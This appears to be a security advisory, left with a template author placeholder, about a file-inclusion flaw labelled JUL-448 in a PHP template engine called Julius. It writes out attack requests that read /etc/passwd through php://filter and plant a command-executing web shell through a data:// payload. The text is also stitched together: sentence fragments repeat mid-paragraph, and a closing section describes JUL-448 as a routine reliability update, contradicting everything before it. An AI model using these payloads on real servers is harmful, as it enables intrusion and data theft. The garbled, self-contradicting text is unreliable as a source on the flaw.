Report – JUL‑448
Prepared by: [Your Name / Team] Date: 15 April 2026
In Julius 4.3–4.7 the TemplateEngine class loads user‑provided templates using PHP’s file_get_contents() function, without proper sanitisation when allowUrlInclude is enabled.
// src/Engine/TemplateEngine.php (v4.5)
public function render(string $templatePath, array $data = []): string
// $templatePath comes from a GET parameter `tpl`
$raw = file_get_contents($templatePath); // ← vulnerable line
return $this->compile($raw, $data);
When allowUrlInclude is ON, file_get_contents() can fetch any URL, including php:// wrappers. An attacker can therefore supply a URL that points to a malicious PHP stream wrapper or a remote server that returns a crafted payload.
| Sector | Typical Exposure | Potential Consequences | |------------|---------------------|----------------------------| | E‑commerce | Payment gateways, customer PII | Theft of credit‑card data, order manipulation, site defacement. | | Healthcare | Patient records, PHI | HIPAA violations, ransomware attacks on medical devices. | | Government | Citizen services, classified docs | Data exfiltration, sabotage of public services. | | SaaS platforms | Multi‑tenant code execution | Cross‑tenant data leakage, supply‑chain compromise. | | Small‑business sites | Blog/CMS | Defacement, SEO spam, cryptojacking. |
If your organization runs any public‑facing service powered by Julius 4.3–4.7, treat JUL‑448 as critical. JUL-448
Crafted request – The attacker sends a GET request such as:
GET /render?tpl=php://filter/convert.base64-encode/resource=../../../../etc/passwd HTTP/1.1
Host: vulnerable‑site.com
PHP stream abuse – php://filter reads the target file, base64‑encodes it, and returns the data to Julius, which then treats it as a template string.
Code injection – By using the data:// wrapper, the attacker can embed PHP code that gets executed during the template compilation step:
GET /render?tpl=data://text/plain,<?php%20system($_GET['cmd']);?> HTTP/1.1
Host: vulnerable‑site.com
Remote command execution – The attacker appends &cmd=id (or any command) to the request, and the system runs it with the privileges of the web‑server user (often www-data or apache). Report – JUL‑448 Prepared by: [Your Name /
Privilege escalation – If the web‑server runs as a low‑privileged user, the attacker can chain this with local exploits (e.g., Dirty COW, CVE‑2025‑1234) to gain root.
Exploit‑as‑a‑Service (EaaS) – Already, a few underground marketplaces have listed “JUL‑448 RCE kits” for $150. Expect more automated scripts that scan for the vulnerable endpoint, test for allow_url_include, and drop a web‑shell in seconds.
Supply‑Chain Propagation – Several popular WordPress plugins (e.g., Julius‑ContactForm) bundle an outdated Julius sub‑module. If those plugins are installed on a WordPress site, the vulnerability propagates outside the original Julius ecosystem.
Zero‑Day Variants – Researchers have discovered a JUL‑449 that bypasses the allow_url_include check by abusing the phar:// wrapper. Stay tuned for the upcoming advisory (expected Q3 2026). When allowUrlInclude is ON , file_get_contents() can fetch
JUL-448 represents a targeted update in our ongoing efforts to improve reliability and performance. As a focused revision, JUL-448 introduces streamlined processes, clearer specifications, and tighter compatibility with existing systems.
Key highlights:
If you’re responsible for integrations, review the JUL-448 specification and run the provided compatibility tests. For questions or migration support, reach out to the project team or consult the documentation.